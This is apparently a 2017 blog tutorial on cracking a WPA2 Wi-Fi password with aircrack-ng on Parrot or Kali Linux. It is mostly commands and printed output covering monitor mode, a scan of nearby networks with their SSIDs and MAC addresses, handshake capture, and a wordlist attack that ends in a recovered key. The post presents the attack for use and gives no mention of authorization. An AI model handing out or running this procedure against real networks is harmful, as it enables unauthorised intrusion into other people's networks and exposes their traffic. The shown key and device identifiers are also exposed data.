How to crack a wireless WPA2 network with aircrack on Parrot or Kali Linux.

Posted: July 26, 2017. At: 12:09 PM. This was 4 weeks ago. Post ID: 10984

To start a Wireless interface in monitor mode, use this command. This will create a new interface that we may use to attempt to crack a wireless network.

┌─[root@parrot][/home/user]
└──╼ #airmon-ng start wlan1
 
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'
 
  PID Name
 1142 NetworkManager
 1253 wpa_supplicant
 
PHY	Interface	Driver		Chipset
 
phy0	wlan0		ath9k		Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01)
phy2	wlan1		rtl8187		Realtek Semiconductor Corp. RTL8187
 
		(mac80211 monitor mode vif enabled for [phy2]wlan1 on [phy2]wlan1mon)
		(mac80211 station mode vif disabled for [phy2]wlan1)

Now get a listing of all wireless networks and MAC addresses using the new monitor interface.

[root@parrot][/home/user]
└──╼ #airodump-ng wlan1mon

This is the output that you should get. A listing of all MAC addresses and wireless networks.

 CH  7 ][ Elapsed: 24 s ][ 2017-07-26 01:40                                         
 
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 
 00:25:00:FF:94:73   -1        0        0    0  -1  -1                    <length:  0>                                                        
 E0:B9:E5:B8:31:BB  -30       29       17    0  11  54e  WPA2 CCMP   PSK  OPTUSVD3AEDEA                                                       
 FA:AB:05:96:21:1A  -61        4        0    0   1  54e  OPN              Telstra Air                                                         
 FA:AB:05:96:21:1B  -62        4        1    0   1  54e  OPN              Fon WiFi                                                            
 F8:AB:05:96:20:19  -62        9        0    0   1  54e  WPA2 CCMP   PSK  Telstra962013                                                       
 E0:B9:E5:6E:D3:69  -59       36       49    2   6  54e  WPA2 CCMP   PSK  Telstra6ED369                                                       
 C4:EA:1D:6A:65:D7  -64       14        0    0   1  54e  WPA2 CCMP   PSK  Telstra6A65D7                                                       
 FA:AB:05:CF:98:E2  -64        9        0    0   6  54e  OPN              Telstra Air                                                          
 F8:AB:05:CF:97:E1  -65        9        0    0   6  54e  WPA2 CCMP   PSK  TelstraCF97DB                                                        
 FA:AB:05:CF:98:E3  -65       12        0    0   6  54e  OPN              Fon WiFi                                                             
 C6:EA:1D:6C:4D:34  -66        2        0    0   6  54e. OPN              Fon WiFi                                                             
 C4:EA:1D:6C:4D:31  -68        2        0    0   6  54e  WPA2 CCMP   PSK  Telstra6C4D31                                                        
 
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                     
 
 00:25:00:FF:94:73  EE:3F:54:D9:F1:03  -16    0 -12    101       37                                                                            
 E0:B9:E5:B8:31:BB  8C:79:67:9A:44:4A  -36    0 - 1      0        1                                                                            
 FA:AB:05:96:21:1B  C4:42:02:8F:BC:58  -69    0 - 1e     0        5

Now we focus on one wireless network to capture a handshake, which is a user connecting to a wireless network.

┌─[[email protected]]─[/home/user]
└──╼ #airodump-ng –bssid E0:B9:E5:B8:31:BB -c 11 –write password wlan1mon

And I was successful, the WPA handshake text tells me that I have captured a 3-way handshake.

CH 11 ][ Elapsed: 2 mins ][ 2017-07-26 01:48 ][ WPA handshake: E0:B9:E5:B8:31:BB                                         
 
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 
 E0:B9:E5:B8:31:BB  -21 100     1685      466    0  11  54e  WPA2 CCMP   PSK  OPTUSVD3AEDEA                                                   
 
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                    
 
 E0:B9:E5:B8:31:BB  8C:79:67:9A:44:4A  -30    1e- 1      0       54                                                                            
 E0:B9:E5:B8:31:BB  F0:25:B7:FA:01:4A  -32    1e- 1e     0       22

Now it is time to crack the cap file. Use very large wordlist file if you are not sure about what the password is. This will not work unless the password is in the wordlist.

┌─[root@parrot][/home/user]
└──╼ #aircrack-ng password-01.cap -w rockyou.txt

And I was successful. The WPA2 Pre Shared Key was cracked easily. This is easier if there are a lot of users on the network that are constantly connecting, makes capturing a key easier.

                                 Aircrack-ng 1.2 rc4
 
      [00:00:00] 24/7120716 keys tested (870.89 k/s) 
 
      Time left: 2 hours, 16 minutes, 24 seconds                 0.00%
 
                        KEY FOUND! [ debian589547FFG ]
 
 
      Master Key     : 81 B4 24 04 9A 4B 3B D3 15 D6 D6 46 92 3C 9E 1B 
                       24 3E 47 47 F7 74 B6 F2 40 E8 A3 26 ED 36 79 CF 
 
      Transient Key  : 41 87 8E 9A 9B 95 83 7A 15 B6 6C 31 9B DA 64 34 
                       57 BD 01 19 7C E5 6D 25 C0 61 00 1E 50 51 9D 6A 
                       AB 7F 30 A9 FE D7 42 32 CB E9 D5 08 5A D8 FE FC 
                       D5 2A 28 77 C2 9A 2F 97 70 D0 87 44 A7 60 0E 49 
 
      EAPOL HMAC     : 4F 40 BA D7 D7 02 87 57 B8 AA 63 02 7D B7 F4 72

No comments have been made. Use this form to start the conversation :)

Leave a Reply